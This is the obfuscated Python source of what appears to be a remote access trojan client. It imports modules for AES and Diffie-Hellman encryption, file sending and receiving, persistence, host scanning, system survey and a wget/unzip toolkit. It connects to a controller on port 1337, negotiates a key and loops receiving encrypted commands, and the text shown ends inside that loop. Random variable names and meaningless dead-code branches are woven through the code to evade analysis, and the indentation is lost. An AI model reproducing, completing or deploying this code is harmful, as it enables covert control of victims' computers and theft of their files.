kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW = 'HAGCesfUwALLmxqkwjodEbOEQKSfNhlaGcvNCtfBiOJVNeIpAkvrZSNucIvbkSzM'
oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA = 'FoKXqSKHNScYajltvQUCpGbpfTpWXRvXyNNJyGglCFVknezoxMLzmvaWuevxxanJ'
if xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST == dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN:
for dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN in xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST:
if xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST == xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST:
kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW = 'oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA'
elif kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW == oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA:
oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA = dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN
else:
dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN = xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST
elif kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW == kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW:
for kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW in xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST:
if oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA == xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST:
kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW = 'oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA'
elif kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW == oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA:
oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA = dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN
else:
dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN = xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST
for kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW in xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST:
if oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA == xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST:
kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW = 'oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA'
elif kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW == oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA:
oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA = dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN
else:
dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN = oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA
else:
dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN = xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST
try:
qtYUhZQwuqUMXOXknsLBgzIlktgoyZfsAnvYcQfwJWJqXMFFRyKDaGaStBeeAnbC = 'GysyZadObJevdPPBxSRuIEQdRawdZJiAWqsYfwhgVnJBQcMHiAMpRdermPoVAeDh'
gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo = 'vhVDnQiOvMwDQlLPlSwRGuFEmzSZyAIuzNoGkwyLNLFdqHRHmpqCSDjmCciFMShO'
BKhQMAyIjxUahKPTvUxJaeOpXcjElKCCxOSwewtDoeupIJkQPYxKEsAbWIHmJICL = 'IKdYWObTRQFsJuEujVcRlaEmyscDvsJCortJxsatrnaQTGDTGZubAXrURxpQHSFf'
bjbCjJnEdQebkJOfYEaejowlZgPGImAxJAryTQvLhtUdYIuyICyljbVSMgeApgEJ = 'HvKHSDYmGEJEWfAsKqsgCgRpiCWVzSitTZVlfvOaNpkXSwwADNSMGhMQSbSxrHQP'
VVNUSTEphPIagMPHviAvPlkfPoyXNndyctPycAfWFchDZQpbQjtbdesFRrIZDqxN = 'DZuxaTMPINEbXlSYyuOdentPSWBBVXXXrfKUFKnDcotMwzIjsQhMyTRRySzdfMDx'
ltqrdKnlNPSEyOnztxTdePctXvNtrMlWzFzASqzwCnmpXZGqIbNCELxNOgzLhYVo = 'CTbthzhkKpBvwjvSncdcUcpMURxVnCXjVEjxCsEGiFwBnNaQvweUBygWFrgBdaEm'
RGhCdsOOVGTFHBMclmriaolrdxONEyDpufesZpORMoaxPRRQLNLouogtMHzGLHhK = [
'GysyZadObJevdPPBxSRuIEQdRawdZJiAWqsYfwhgVnJBQcMHiAMpRdermPoVAeDh',
'IKdYWObTRQFsJuEujVcRlaEmyscDvsJCortJxsatrnaQTGDTGZubAXrURxpQHSFf',
'DZuxaTMPINEbXlSYyuOdentPSWBBVXXXrfKUFKnDcotMwzIjsQhMyTRRySzdfMDx',
'LmaIXdBTlGYSCOXXNTqEfenKcHQjPsksNNoGFqUjZIryzDympuKvvVfpJOyDoFeu'
]
for qtYUhZQwuqUMXOXknsLBgzIlktgoyZfsAnvYcQfwJWJqXMFFRyKDaGaStBeeAnbC in ltqrdKnlNPSEyOnztxTdePctXvNtrMlWzFzASqzwCnmpXZGqIbNCELxNOgzLhYVo:
for gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo in BKhQMAyIjxUahKPTvUxJaeOpXcjElKCCxOSwewtDoeupIJkQPYxKEsAbWIHmJICL:
if bjbCjJnEdQebkJOfYEaejowlZgPGImAxJAryTQvLhtUdYIuyICyljbVSMgeApgEJ == VVNUSTEphPIagMPHviAvPlkfPoyXNndyctPycAfWFchDZQpbQjtbdesFRrIZDqxN:
gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo = qtYUhZQwuqUMXOXknsLBgzIlktgoyZfsAnvYcQfwJWJqXMFFRyKDaGaStBeeAnbC
elif VVNUSTEphPIagMPHviAvPlkfPoyXNndyctPycAfWFchDZQpbQjtbdesFRrIZDqxN == gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo:
gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo = ltqrdKnlNPSEyOnztxTdePctXvNtrMlWzFzASqzwCnmpXZGqIbNCELxNOgzLhYVo
else:
VVNUSTEphPIagMPHviAvPlkfPoyXNndyctPycAfWFchDZQpbQjtbdesFRrIZDqxN = ltqrdKnlNPSEyOnztxTdePctXvNtrMlWzFzASqzwCnmpXZGqIbNCELxNOgzLhYVo
for gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo in RGhCdsOOVGTFHBMclmriaolrdxONEyDpufesZpORMoaxPRRQLNLouogtMHzGLHhK:
BKhQMAyIjxUahKPTvUxJaeOpXcjElKCCxOSwewtDoeupIJkQPYxKEsAbWIHmJICL = gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo
from core.crypto import AES_decrypt, AES_encrypt, diffiehellman
GmvWYChatdyViSZvhphpvvUxkPjpkXBhwCJpaSuLTIGbZgwOhcAEgsPHxQHDVsiV = 'SBJnMxByNUzJDBJsRJFSJGjrlKtVQyfElKIDzcgqeaBkZMAqJLVBjImECMQDVdaI'
sDlBNuaqucESNgzlUaVsloeLuQnTMfoQFVVKBYItrvWMxcoMMhuBAJecniqmRwxt = 'ndiZPQbGkAaDgnJcPFouMLxgcJBQwFTxwsjscrgaAKAyzxFtFZjallIVmthswFST'
nYIwywIviRjxKcSJAuJTagAoWBQgeecPBoQaxDrKTiGUaNvfveVHdtsZcMSOMqMP = 'gBqvSMxmoUkfCUoQXmrWPqgGguxAbVYJSOJfXvYfLzwHcUMSCIFjOhhEKEeVpBIW'
if GmvWYChatdyViSZvhphpvvUxkPjpkXBhwCJpaSuLTIGbZgwOhcAEgsPHxQHDVsiV == sDlBNuaqucESNgzlUaVsloeLuQnTMfoQFVVKBYItrvWMxcoMMhuBAJecniqmRwxt:
nYIwywIviRjxKcSJAuJTagAoWBQgeecPBoQaxDrKTiGUaNvfveVHdtsZcMSOMqMP = 'gBqvSMxmoUkfCUoQXmrWPqgGguxAbVYJSOJfXvYfLzwHcUMSCIFjOhhEKEeVpBIW'
nYIwywIviRjxKcSJAuJTagAoWBQgeecPBoQaxDrKTiGUaNvfveVHdtsZcMSOMqMP = GmvWYChatdyViSZvhphpvvUxkPjpkXBhwCJpaSuLTIGbZgwOhcAEgsPHxQHDVsiV
else:
nYIwywIviRjxKcSJAuJTagAoWBQgeecPBoQaxDrKTiGUaNvfveVHdtsZcMSOMqMP = 'gBqvSMxmoUkfCUoQXmrWPqgGguxAbVYJSOJfXvYfLzwHcUMSCIFjOhhEKEeVpBIW'
nYIwywIviRjxKcSJAuJTagAoWBQgeecPBoQaxDrKTiGUaNvfveVHdtsZcMSOMqMP = 'SBJnMxByNUzJDBJsRJFSJGjrlKtVQyfElKIDzcgqeaBkZMAqJLVBjImECMQDVdaI'
from core.filesock import recvfile, sendfile
cpAkyfEymffhGkPlzujoklVGOQdPoMwrWwDYCQtEiYXdwnxKWFDSvPQQCkbCOqRJ = 'TaLmwvYfsXVQwsxGjTWwYKPAHZaPPubQDFuBYJvLBVwAbFFVCRpBZCYvZZATCtbh'
WzBhKvMfuovwkMUFFtXRkDuSsOFbalkURSnclIyTSXxAkxDtOAATHhcWVFTCGRAi = 'hMnNhaUYhzelYYOjXXPmBePEkZPnjrlqwbliiDjNGZefiLgFfoZeQtEbRPShJnOo'
if cpAkyfEymffhGkPlzujoklVGOQdPoMwrWwDYCQtEiYXdwnxKWFDSvPQQCkbCOqRJ != WzBhKvMfuovwkMUFFtXRkDuSsOFbalkURSnclIyTSXxAkxDtOAATHhcWVFTCGRAi:
cpAkyfEymffhGkPlzujoklVGOQdPoMwrWwDYCQtEiYXdwnxKWFDSvPQQCkbCOqRJ = 'hMnNhaUYhzelYYOjXXPmBePEkZPnjrlqwbliiDjNGZefiLgFfoZeQtEbRPShJnOo'
WzBhKvMfuovwkMUFFtXRkDuSsOFbalkURSnclIyTSXxAkxDtOAATHhcWVFTCGRAi = cpAkyfEymffhGkPlzujoklVGOQdPoMwrWwDYCQtEiYXdwnxKWFDSvPQQCkbCOqRJ
cpAkyfEymffhGkPlzujoklVGOQdPoMwrWwDYCQtEiYXdwnxKWFDSvPQQCkbCOqRJ = 'TaLmwvYfsXVQwsxGjTWwYKPAHZaPPubQDFuBYJvLBVwAbFFVCRpBZCYvZZATCtbh'
from core.persistence import run
WuPDrhOKblJfEsWCBKwMAUZowkCfoPpxyWHpFkDCDFJMlZIrbQDnrABaRhJwIhNM = 'WITTLkIbXgtuyyPtUDlVIbGVZOIzdVOQKGrZSguadNUSEWpValQmyIUNgwDEwcgt'
from core.scan import single_host
lJOCltYGQYsnQzBWEAkmCtpccTvwfBuAeQRFQxaBFFeAQJrryINiSzkbLZYhLoTw = 'KGhhCPZevQyKaJsHZKatccosNRWeJRUewBjgljMxlDeAGyuQIZMkrcGcwEvrekQY'
from core.survey import run
aaVgpWsJNhcrFnUssuAXMTTdzrucVKekzLmaBghjZrYMnkiaCpuqeWFAAqkiMVKz = 'TFYXgOsjRtRvapmjPRxwveSenwwxBgwCmvfyWDYsFWqoYxXItnWoisdejlzvBpNM'
eVmApFUQsgbPwPhtXPdkXWjEQKjRNDDpWGzgtunguWSDFvSoXwOudskerzYInElR = 'TjYxcyxHATRUjVzokBHuyqqpJsrvnVZxXDZBbCFOmeQGRgqyzOzIpnuVtYiVtPte'
if aaVgpWsJNhcrFnUssuAXMTTdzrucVKekzLmaBghjZrYMnkiaCpuqeWFAAqkiMVKz != eVmApFUQsgbPwPhtXPdkXWjEQKjRNDDpWGzgtunguWSDFvSoXwOudskerzYInElR:
aaVgpWsJNhcrFnUssuAXMTTdzrucVKekzLmaBghjZrYMnkiaCpuqeWFAAqkiMVKz = 'TjYxcyxHATRUjVzokBHuyqqpJsrvnVZxXDZBbCFOmeQGRgqyzOzIpnuVtYiVtPte'
eVmApFUQsgbPwPhtXPdkXWjEQKjRNDDpWGzgtunguWSDFvSoXwOudskerzYInElR = aaVgpWsJNhcrFnUssuAXMTTdzrucVKekzLmaBghjZrYMnkiaCpuqeWFAAqkiMVKz
aaVgpWsJNhcrFnUssuAXMTTdzrucVKekzLmaBghjZrYMnkiaCpuqeWFAAqkiMVKz = 'TFYXgOsjRtRvapmjPRxwveSenwwxBgwCmvfyWDYsFWqoYxXItnWoisdejlzvBpNM'
from core.toolkit import wget, unzip
NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI = 'MhVETBdKWQaRHGolVMMjtCOiBNeHBxNIasRqSPTiznMlHtLbMoTIFVuttHsxsEEO'
PqSaeDPiVsTKYqXVEBLEdlomdGNeqAiPVBfsORFcjNHOfdeaLctWHvuNxjMaQNlo = 'yNczMlhaIOmmyvAfUPdJKEptILgCWRmPTmhRXfePGnDJjtIzVfUgZjSKksqdIoRq'
xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX = 'CjmZixfEWDkoErRJitenwZcfHSpwIxQOhgslYoGuQDWRywEGqHSOyblXrrdxImWD'
KEfcEpZPpoOUjUDRwwvLRQdsRdzhOnfedijBewuCoNPrFliTUWEkkpYETtnhtjap = 'zqUYrAQpMaYjLqudilhBLABYFFxOSGUXwPRAQaHosxPqqDQFcSbzjaApnQTjYMMX'
EzRSbSezGUCGaSpSjVcVWfLYJxYyEJqLOAJrNRbPnPRAlJdgssjucGIebBzTynbJ = 'aDyzjRbcoBIkKwNuFrOftRbPLdzonxmEcBKhyxqAhKFDUnffVVcaydOqkHoeVjgE'
ZnmzgJmZkionRGcSpXTxoOqlzMEUEgJRkndCeepIQBUrMCqbFFVxrWNDpVJioQPq = 'OuTUQzaclBMAEujXdBgHlUpakENcGsjdrQHyrhIDXaiDQckxhQqnMfqEsiSqsVGe'
if NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI != KEfcEpZPpoOUjUDRwwvLRQdsRdzhOnfedijBewuCoNPrFliTUWEkkpYETtnhtjap:
PqSaeDPiVsTKYqXVEBLEdlomdGNeqAiPVBfsORFcjNHOfdeaLctWHvuNxjMaQNlo = xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX
for ZnmzgJmZkionRGcSpXTxoOqlzMEUEgJRkndCeepIQBUrMCqbFFVxrWNDpVJioQPq in KEfcEpZPpoOUjUDRwwvLRQdsRdzhOnfedijBewuCoNPrFliTUWEkkpYETtnhtjap:
if ZnmzgJmZkionRGcSpXTxoOqlzMEUEgJRkndCeepIQBUrMCqbFFVxrWNDpVJioQPq != xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX:
PqSaeDPiVsTKYqXVEBLEdlomdGNeqAiPVBfsORFcjNHOfdeaLctWHvuNxjMaQNlo = PqSaeDPiVsTKYqXVEBLEdlomdGNeqAiPVBfsORFcjNHOfdeaLctWHvuNxjMaQNlo
else:
EzRSbSezGUCGaSpSjVcVWfLYJxYyEJqLOAJrNRbPnPRAlJdgssjucGIebBzTynbJ = NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI
else:
xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX = NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI
NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI = EzRSbSezGUCGaSpSjVcVWfLYJxYyEJqLOAJrNRbPnPRAlJdgssjucGIebBzTynbJ
if xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX == NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI:
for ZnmzgJmZkionRGcSpXTxoOqlzMEUEgJRkndCeepIQBUrMCqbFFVxrWNDpVJioQPq in NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI:
if ZnmzgJmZkionRGcSpXTxoOqlzMEUEgJRkndCeepIQBUrMCqbFFVxrWNDpVJioQPq == xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX:
xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX = NOvXayrdFvhPFmFojcwqLpJHqtixGKolgAOsgUqGvMyLnuoMEyzfHKIkfuFMVMPI
else:
xvAjlxuzNFenbauYFxaZXEctBCLrOdXFRJMhPAiiwAqvdmnqKLNVotfLhkHhfmIX = EzRSbSezGUCGaSpSjVcVWfLYJxYyEJqLOAJrNRbPnPRAlJdgssjucGIebBzTynbJ
except ImportError as ClzWdZTtdhpNhuKbtPJSjiontGEGaUFjHaQuWIvsykjeHsAXAKsqunfRlxRVDmuu:
SubwpTRohzghWzGqjzLqpqIoYhDGrMkoMCkruvzPlMImpBMpEkYPpcPdVRWkNNHm = 'AvXpdukeatIPFFLaTWBAfYATjvrofBhPHpQDIkegzkRNNrsvuaoTYuuBnZbwfINH'
EpYehrJLwnMxSUZUEBuWtmbtwciouoAFZtXBXRUMfwUswGtxsVWTggxWhwpGYuRH = 'twsklWzlsbFzWyHrAJdMCsrJMbUZYXlDjtWnHaxkzPzJkSFGXmQOvbVDlIUGUpNj'
LzfOSehPxUUUyONOqNnrAIYFGszmzPFhhivRYKLXciykLaQPbHuRmpqYkyBuaODv = 'uLMULjWgwYhVWyVMFOoZJvsDAmlIaSPSsWMKKtrLjUtYnktMPpeaTFmQQVGZVpjG'
if SubwpTRohzghWzGqjzLqpqIoYhDGrMkoMCkruvzPlMImpBMpEkYPpcPdVRWkNNHm == EpYehrJLwnMxSUZUEBuWtmbtwciouoAFZtXBXRUMfwUswGtxsVWTggxWhwpGYuRH:
LzfOSehPxUUUyONOqNnrAIYFGszmzPFhhivRYKLXciykLaQPbHuRmpqYkyBuaODv = 'uLMULjWgwYhVWyVMFOoZJvsDAmlIaSPSsWMKKtrLjUtYnktMPpeaTFmQQVGZVpjG'
LzfOSehPxUUUyONOqNnrAIYFGszmzPFhhivRYKLXciykLaQPbHuRmpqYkyBuaODv = SubwpTRohzghWzGqjzLqpqIoYhDGrMkoMCkruvzPlMImpBMpEkYPpcPdVRWkNNHm
else:
LzfOSehPxUUUyONOqNnrAIYFGszmzPFhhivRYKLXciykLaQPbHuRmpqYkyBuaODv = 'uLMULjWgwYhVWyVMFOoZJvsDAmlIaSPSsWMKKtrLjUtYnktMPpeaTFmQQVGZVpjG'
LzfOSehPxUUUyONOqNnrAIYFGszmzPFhhivRYKLXciykLaQPbHuRmpqYkyBuaODv = 'AvXpdukeatIPFFLaTWBAfYATjvrofBhPHpQDIkegzkRNNrsvuaoTYuuBnZbwfINH'
print(ClzWdZTtdhpNhuKbtPJSjiontGEGaUFjHaQuWIvsykjeHsAXAKsqunfRlxRVDmuu)
sys.exit(0)
ifkyjfqMKsCDTTKFljvJpynmzoQOwTIGPtROJfuaHPXOZyRatKVogjTWNRvciIlg = sys.platform
adEmHlQyrOqdXhOUYKdcbsPRLxFvrIOUKLUfWxOjNuqRVZQQsJzaBpLNoJGeIjSL = 'kUQxyIxanqwmYwtGLWuFkHgqQwFeeTcxvnitAOWRbBfmCEygTpkuHdXAcCIKMPDv'
FxTPoySufueEOvxZbhFkTCbjeKHcqzBpqwvDlsDuMvnhEbWEawNKEHYAIaiAQzSv = 'spvshnzqbEQXkOTUeXCYAcYpUhAwNNGEWvUaRBbmoodQDnCJPFtLffukDOgHADbF kUQxyIxanqwmYwtGLWuFkHgqQwFeeTcxvnitAOWRbBfmCEygTpkuHdXAcCIKMPDv'
HxOFAfTWcjPHWEkBdHzuBaijqQKVMcHzcDnSxmAkZKcUeuAkSxulkRnsQRlpoUrD = 'localhost'
suksSWiHpdlEqDHlBRJxVGXVKZhZhjohUiDFhTvuVbEGDBMlHwdBIiGpxwVFlAgP = 1337
sGmIyFXCcjjvihfxOJvwuWAtUFJcLrpvRCunDguQMpNDDmCMZTmLSzPNsPyrEvnj = 'b14ce95fa4c33ac2803782d18341869f'
def seikgwnzTHwHPwktHYrqMmlXUtYiicrqXQdEadtEymMyRPOeOZFlkqYVlcTWhaFe():
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk = socket.socket()
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.connect((HxOFAfTWcjPHWEkBdHzuBaijqQKVMcHzcDnSxmAkZKcUeuAkSxulkRnsQRlpoUrD, suksSWiHpdlEqDHlBRJxVGXVKZhZhjohUiDFhTvuVbEGDBMlHwdBIiGpxwVFlAgP))
wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa = diffiehellman(gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk)
while True:
clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF = 'XzXQnsixkxNgwxQqVGuBImSPBwcFuzpwsPYLXDWzaGGbYxDEHYjHTbKitjJsPMjR'
pHllEWnzwYtFQuzUHjouBhzLZMVKqQGMVxjCjTWlgKVxwaNJSjvqGJgexWJDEOdy = 'CFluTAcuaylOQNrjpNMomISesffLaANmooaveEhwczzoWOKvIAeYkPLqijCgtKZy'
TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM = 'hCHAVQYQdSwCNZVlxFguXObDHmIFxldJzdHeqoZvXkiHjCKFGXrXtOtyNearDaPA'
mYiRjzKecbeovtavmvezdLjPUIrFOZavSNapkqkHxNGbUyvoVfLKQDmHeTDAUNZt = 'FnkPjtgUoFhEgWcBWCapqOGZIxQuqjZMEpqkgChLcmNVtRIGmjcXLzkfUTcmKVCG'
LHXVrIxHBvXbILbppWlRjyfSgfuXSQlCPAmWgaWmzjZHvqNVVhOfTBZhZeopgirx = 'PuHatkZJZFxoofsJRtfCHKTFPcHDmyomexFHwSxfHRJaXiaXicgzcXwldjEFSeOj'
ZjJfCyYakmBlxPtwNymFZlNTCcbSGOhbNKRZkvmRNzJlZCDoMpXbdZiQdEsyAlcD = 'HEDjyogAKBcvIcDohnAijSQbTCvBzqNfYvykwDoiJgixbDbAVvaHYEDXuFUHOTKu'
if clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF != mYiRjzKecbeovtavmvezdLjPUIrFOZavSNapkqkHxNGbUyvoVfLKQDmHeTDAUNZt:
pHllEWnzwYtFQuzUHjouBhzLZMVKqQGMVxjCjTWlgKVxwaNJSjvqGJgexWJDEOdy = TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM
for ZjJfCyYakmBlxPtwNymFZlNTCcbSGOhbNKRZkvmRNzJlZCDoMpXbdZiQdEsyAlcD in mYiRjzKecbeovtavmvezdLjPUIrFOZavSNapkqkHxNGbUyvoVfLKQDmHeTDAUNZt:
if ZjJfCyYakmBlxPtwNymFZlNTCcbSGOhbNKRZkvmRNzJlZCDoMpXbdZiQdEsyAlcD != TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM:
pHllEWnzwYtFQuzUHjouBhzLZMVKqQGMVxjCjTWlgKVxwaNJSjvqGJgexWJDEOdy = pHllEWnzwYtFQuzUHjouBhzLZMVKqQGMVxjCjTWlgKVxwaNJSjvqGJgexWJDEOdy
else:
LHXVrIxHBvXbILbppWlRjyfSgfuXSQlCPAmWgaWmzjZHvqNVVhOfTBZhZeopgirx = clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF
else:
TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM = clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF
clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF = LHXVrIxHBvXbILbppWlRjyfSgfuXSQlCPAmWgaWmzjZHvqNVVhOfTBZhZeopgirx
if TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM == clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF:
for ZjJfCyYakmBlxPtwNymFZlNTCcbSGOhbNKRZkvmRNzJlZCDoMpXbdZiQdEsyAlcD in clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF:
if ZjJfCyYakmBlxPtwNymFZlNTCcbSGOhbNKRZkvmRNzJlZCDoMpXbdZiQdEsyAlcD == TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM:
TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM = clIyrotxBHiZdHpnUkapKwlikTkWBQwATKZVavKFRrCfTmFxOVLDzXDKQruTJKJF
else:
TNeiqPywWVTKiVFOyCreuWGXHthiUgexESVSXmhHxKeMjOYEBmdHfoUhGRIimCnM = LHXVrIxHBvXbILbppWlRjyfSgfuXSQlCPAmWgaWmzjZHvqNVVhOfTBZhZeopgirx
FXRrWAzIHjxZcHYYdcbgaXeaFjAhmzOyaeEJgxiIuyrxhwdbmbSjXjCIeOVCdbGm = gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.recv(1024)
FXRrWAzIHjxZcHYYdcbgaXeaFjAhmzOyaeEJgxiIuyrxhwdbmbSjXjCIeOVCdbGm = AES_decrypt(FXRrWAzIHjxZcHYYdcbgaXeaFjAhmzOyaeEJgxiIuyrxhwdbmbSjXjCIeOVCdbGm, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa)
